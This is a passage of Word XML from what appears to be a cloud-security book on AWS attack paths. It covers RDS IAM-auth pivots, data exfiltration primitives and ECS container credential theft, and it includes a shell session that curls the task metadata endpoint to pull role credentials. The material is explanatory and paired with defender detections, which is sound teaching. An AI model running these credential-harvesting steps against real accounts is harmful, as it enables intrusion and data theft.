          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E5A4E5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>12.6  RDS IAM auth and the password-less pivot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F3E83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Many RDS instances today support IAM database authentication, which generates a 15-minute database token via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>rds-db:connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. If an attacker holds an identity with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>rds-db:connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>arn:aws:rds-db:region:account:dbuser:dbi-resource-id/username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, they can mint an auth token and connect as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> without a password. The defender's mitigation is to scope </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>rds-db:connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> precisely by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dbuser/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> suffix; in practice, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>rds-db:connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is often granted on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, converting any </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>rds-db:connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>-having identity into a database admin for every IAM-authenticated user defined on the instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55216086" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>12.7  Data-service detections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C80D1E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data-service detections that exist are mostly service-native: Aurora audit logs (PostgreSQL or MySQL engine audit plugin), Redshift's STL query log, DynamoDB's CloudTrail data events (off by default), and Athena's query history. GuardDuty's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Exfiltration:S3/AnomalousBehavior</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> will fire on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>S3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> side of any of these if volume is abnormal, which is often the first signal a defender sees — but it is an indirect and slow signal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7500F02A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400A8174" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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RDS / Aurora snapshot sharing and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>StartDBClusterExport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> are cross-account and cross-service exfiltration primitives; KMS cross-account policy is the main gate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E152544" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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DynamoDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ExportTableToPointInTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and DynamoDB Streams are, respectively, a one-shot and a persistent exfiltration primitive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4391A6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Redshift </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>UNLOAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploits the cluster's attached IAM role; the defender's only native signal is the SQL audit log, which is frequently disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07374F2C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Athena CTAS can copy entire Glue-cataloged data lakes to attacker S3 in a single API call; Glue Data Catalog permissions determine the effective read scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE4F17F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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RDS IAM auth with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>rds-db:connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> granted on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> converts the identity into a multi-user database admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D117CEA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Chapter 13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>Containers: ECS, EKS, and Fargate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F1E68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Containers in AWS come in three flavours from the platform's perspective: ECS (AWS-native orchestration), EKS (AWS-managed Kubernetes), and Fargate (serverless container execution, underlying both ECS and EKS). The attacker's mental model has to cover three trust boundaries: the container's own process identity, the pod/task role (ECS task role or EKS service-account-assumed role), and the node's instance profile. A successful container-plane attack almost always involves crossing one of these boundaries — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>most commonly, escaping from a pod's service-account role to the node's instance profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752510B2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>13.1  ECS task roles and task metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FE661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An ECS task has, optionally, a task role (IAM role assumed by the task itself) and a task execution role (used by ECS to pull images, write logs, etc). The task role's credentials are served from a task-local metadata endpoint at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>169.254.170.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, accessed via the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS_CONTAINER_CREDENTIALS_RELATIVE_URI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment variable. Code inside the container reads credentials from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9F49B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Because the endpoint lives on a link-local address, SSRF primitives inside the container can reach it just as they can reach EC2 IMDS — with the important exception that the task metadata endpoint is not protected by an IMDSv2-style PUT flow. Any GET reaches it. This makes SSRF-to-credential exfiltration on an ECS task </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>less</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> gated than on a modern EC2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDB9E4A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="197546159"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>app@ecs-task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>/app$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> | grep CREDENTIALS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5054482F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="197546159"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/b9c4f1e2-1234-5678-aabb-eeee00112233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6221F8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="197546159"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>app@ecs-task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>/app$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBDFA56" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="197546159"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7239ADE0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="197546159"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"RoleArn"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"arn:aws:iam::111122223333:role/ecs-task-etl"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D0554D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="197546159"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"AccessKeyId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"ASIAZ3..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3865263E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="197546159"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"SecretAccessKey"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B78E600" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="197546159"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Token"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081C60CD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="197546159"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Expiration"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"2026-04-20T19:00:00Z"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BA40EF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="197546159"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B59EDF5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>13.2  ECS on EC2 and the node-profile escape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240AC7B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When ECS runs on EC2 (as opposed to Fargate), the host EC2 instance has an instance profile — the ECS container instance role. That role typically has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ecs:RegisterContainerInstance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ecs:Submit*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ecs:Poll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, and usually also </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ecr:*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and often </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>logs:*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is almost always more privileged than the task role. If an attacker inside a container can reach the host's IMDS (for example, when the container is run with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
